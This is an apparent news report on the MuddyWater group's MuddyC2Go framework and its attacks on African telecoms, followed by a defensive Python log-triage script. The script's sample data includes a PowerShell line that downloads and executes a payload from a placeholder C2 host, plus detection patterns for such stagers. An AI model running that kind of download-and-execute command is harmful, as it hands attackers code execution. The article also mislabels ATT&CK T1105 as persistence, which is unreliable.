A recent cybersecurity alert has revealed that the Iranian state-sponsored hacking group known as MuddyWater has deployed a newly identified command-and-control (C2) framework named MuddyC2Go against the telecommunications sectors in Egypt, Sudan, and Tanzania. Researchers at Broadcom’s Symantec Threat Hunter Team track the group under the designation Seedworm; it is also known by several other aliases, including Boggy Serpens and Mango Sandstorm.
MuddyWater’s operations have been observed since 2017, and intelligence links the group to Iran’s Ministry of Intelligence and Security (MOIS). Its targeting has historically focused on entities in the Middle East and now extends to Africa. The emergence of MuddyC2Go is notable because this Golang-based C2 framework replaces the older PhonyC2, and there are indications it may have been in use since at least 2020.
MuddyC2Go ships with an embedded PowerShell script that automatically initiates connections to the attackers’ control server, so no direct operator interaction is needed to establish the connection. In activity from November 2023, the operational chains also employed tools such as SimpleHelp and Venom Proxy, alongside custom-built keyloggers that played a central role in the breaches.
In its targeted attacks, MuddyWater typically relies on phishing emails and the exploitation of known vulnerabilities in unpatched applications to gain initial access. Once inside a system, the group conducts reconnaissance, lateral movement, and data exfiltration. Evidence gathered by Symantec indicates that the group used the MuddyC2Go launcher to establish communication with its command servers while deploying legitimate remote access tools such as AnyDesk and SimpleHelp.
The group’s tactics, techniques, and procedures (TTPs), mapped to the MITRE ATT&CK framework, show initial access through phishing campaigns and exploitation of vulnerabilities (T1566, T1203). Once inside a network, they maintain persistence (T1105) using tools that facilitate remote access, a deliberate approach aimed at prolonging their presence within compromised networks.
In another incident reported by Symantec, an unnamed telecommunications firm was compromised in a similar way, with MuddyWater’s activity relying on prolonged use of SimpleHelp. The same tool had been used in earlier attacks during 2023, in which key payloads such as the JumpCloud remote access software were deployed.
The ongoing escalation of these threats is underscored by other regional developments: in recent weeks, the Israeli-aligned group Gonjeshke Darande has claimed attacks disrupting gas supply networks in Iran in response to regional tensions. This cyber conflict illustrates a growing trend of state-sponsored cyber activity with significant implications for businesses operating in, or connected to, the affected regions.
As organizations contend with increasingly complex cyber threats, PowerShell remains a recurring point of exposure: it is a legitimate administrative tool that groups such as MuddyWater abuse, which makes heightened monitoring and proactive defensive measures essential to mitigate the risk of its unauthorized use. Businesses must stay vigilant, keep systems patched, and train staff to recognize phishing attempts in order to strengthen their overall cybersecurity posture.
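As an added illustration of the PowerShell and remote-access-tool monitoring the article calls for (example code written for this page, not from Symantec's report or MuddyWater's tooling), the following Python triage runs over constructed log events modelled on PowerShell Script Block Logging (event 4104) and Sysmon process creation (event 1). The event field names, the sanctioned-parent allow-list, and the tool name list are hypothetical assumptions for the example.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample events (not real telemetry). Shapes loosely follow
# PowerShell Script Block Logging (4104) and Sysmon process creation (1).
SAMPLE_EVENTS = [
    {"id": 4104, "host": "ws-01", "script": "Get-ChildItem C:\\Users | Sort-Object Length"},
    {"id": 4104, "host": "ws-02",
     "script": "$c=New-Object Net.WebClient;$c.DownloadString('http://c2.example.invalid/stage')|IEX"},
    {"id": 1, "host": "ws-02", "parent": "powershell.exe",
     "image": "C:\\Users\\Public\\remote\\SimpleHelp\\Remote Access.exe"},
    {"id": 1, "host": "ws-03", "parent": "explorer.exe",
     "image": "C:\\Program Files\\AnyDesk\\AnyDesk.exe"},
]

# Hypothetical policy: remote access tools are only expected when launched by
# these parents and from outside user-writable directories.
SANCTIONED_RAT_PARENTS = {"explorer.exe", "msiexec.exe"}
RAT_NAMES = ("simplehelp", "anydesk", "remote access.exe")

# A script block that both fetches remote content and executes it is the
# hallmark of an unattended PowerShell stager; flag the combination, not each half.
DOWNLOAD_CRADLE = re.compile(r"(Net\.WebClient|Invoke-WebRequest|Start-BitsTransfer)", re.I)
EXEC_SINK = re.compile(r"\b(IEX|Invoke-Expression)\b", re.I)


def classify(event: dict) -> Optional[str]:
    """Return a finding label for one event, or None if it looks benign."""
    if event["id"] == 4104:
        script = event["script"]
        if DOWNLOAD_CRADLE.search(script) and EXEC_SINK.search(script):
            return "powershell-download-cradle"
        return None
    if event["id"] == 1:
        image = event["image"].lower()
        if any(name in image for name in RAT_NAMES):
            unexpected_parent = event["parent"].lower() not in SANCTIONED_RAT_PARENTS
            user_writable = "\\users\\" in image
            if unexpected_parent or user_writable:
                return "unsanctioned-remote-access-tool"
    return None


def triage(events: List[dict]) -> List[Tuple[str, str]]:
    """Collect (host, finding) pairs so analysts can pivot on hosts with stacked findings."""
    findings = []
    for event in events:
        label = classify(event)
        if label:
            findings.append((event["host"], label))
    return findings
```

Host ws-02 surfaces both a PowerShell download cradle and a remote access tool started by PowerShell from a user-writable path, the kind of stacked findings worth escalating, while the sanctioned AnyDesk install on ws-03 is left alone.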